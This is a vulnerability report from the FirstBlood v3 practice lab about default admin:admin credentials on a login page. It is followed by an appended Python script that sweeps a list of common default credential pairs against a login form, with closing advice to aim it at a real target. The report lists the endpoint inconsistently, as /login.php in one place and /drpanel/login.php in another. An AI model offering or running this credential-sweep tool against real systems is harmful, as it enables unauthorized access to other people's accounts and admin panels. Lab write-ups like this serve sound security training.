FirstBlood-#1154 Default credentials admin:admin work on login.php
This issue was discovered on FirstBlood v3

On 2022-12-08, 0xblackbird Level 5 reported:

Summary: Hi mate!

I hope you're doing well today!

I found out that the following default credentials work after Ayush1098 pointed me in the right direction ;)!

Possible cause:

It is very likely that any of the admins forgot to change the default credentials and left them untouched.

Impact: I was able to login as an unauthorized user and get access to features I shouldn't have had access to!

Steps to reproduce:

1) Spin up FirstBlood v3 if you haven't already
2) Next, visit /login.php
3) Use the following credentials: admin:admin
4) And click on "Secure Login". You'll notice that we've successfully logged in as the admin username


Changing the default password should be sufficient to fully mitigate this issue.

Thanks! Have a nice day! Kind regards, 0xblackbird


Endpoint: /login.php

Parameter: N/A

Payload: admin:admin

FirstBlood ID: 48
Vulnerability Type: Auth issues

The /drpanel/login.php endpoint accepts weak default credentials (admin:admin), which allows anyone to log in to the admin panel.
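As an added example (not part of the report and not FirstBlood's own code), the steps above can be automated as a default-credential sweep: post each common vendor pair to the login form and flag the ones the application accepts. It assumes the form posts fields named `username` and `password` to /login.php and that a successful login answers with an HTTP redirect while a failed one returns a 200 page saying "Invalid"; neither detail is confirmed by the report. The mock server it starts is a constructed stand-in for the target so the script runs offline.

```python
"""Default-credential sweep against a form-based login.

Added example, not FirstBlood code. Assumptions (not confirmed by the report):
the login form posts `username` and `password` to /login.php, success is
signalled by a 3xx redirect, and failure by a 200 page containing 'Invalid'.
The mock server below is a constructed stand-in for the real application.
"""
import http.client
import http.server
import threading
import urllib.parse

# Constructed list of common vendor defaults; admin:admin is the pair in the report.
DEFAULT_CREDS = [
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", ""),
    ("root", "root"),
    ("test", "test"),
]


def attempt_login(host, port, username, password, path="/login.php"):
    """POST one credential pair and return True if the app appears to accept it.

    http.client does not follow redirects, so the 302 a PHP login typically
    issues on success is observed directly. Success heuristic (assumption):
    any 3xx, or a 200 body that does not contain 'invalid'."""
    body = urllib.parse.urlencode({"username": username, "password": password})
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("POST", path, body=body,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        text = resp.read().decode("utf-8", errors="replace")
    finally:
        conn.close()
    if 300 <= resp.status < 400:
        return True
    return resp.status == 200 and "invalid" not in text.lower()


def sweep(host, port, creds=DEFAULT_CREDS, path="/login.php"):
    """Try every pair in order and return the ones the application accepted."""
    return [(u, p) for u, p in creds if attempt_login(host, port, u, p, path)]


class _MockLogin(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a login.php that still accepts admin:admin."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        if (user, pw) == ("admin", "admin"):
            # Successful login: redirect into the admin panel with a session cookie.
            self.send_response(302)
            self.send_header("Location", "/drpanel/")
            self.send_header("Set-Cookie", "session=mock")
            self.end_headers()
        else:
            page = b"<html><body>Invalid credentials</body></html>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(page)))
            self.end_headers()
            self.wfile.write(page)

    def log_message(self, *args):  # keep the sweep output quiet
        pass


def start_mock_server():
    """Serve the mock login on an ephemeral loopback port; returns (server, port)."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    srv, port = start_mock_server()
    try:
        print("accepted:", sweep("127.0.0.1", port))
    finally:
        srv.shutdown()
```

Against a real target, point `sweep` at the host and adjust the field names and the success heuristic to what the form actually does; checking for a redirect or a session cookie is more reliable than matching error text, which changes between versions.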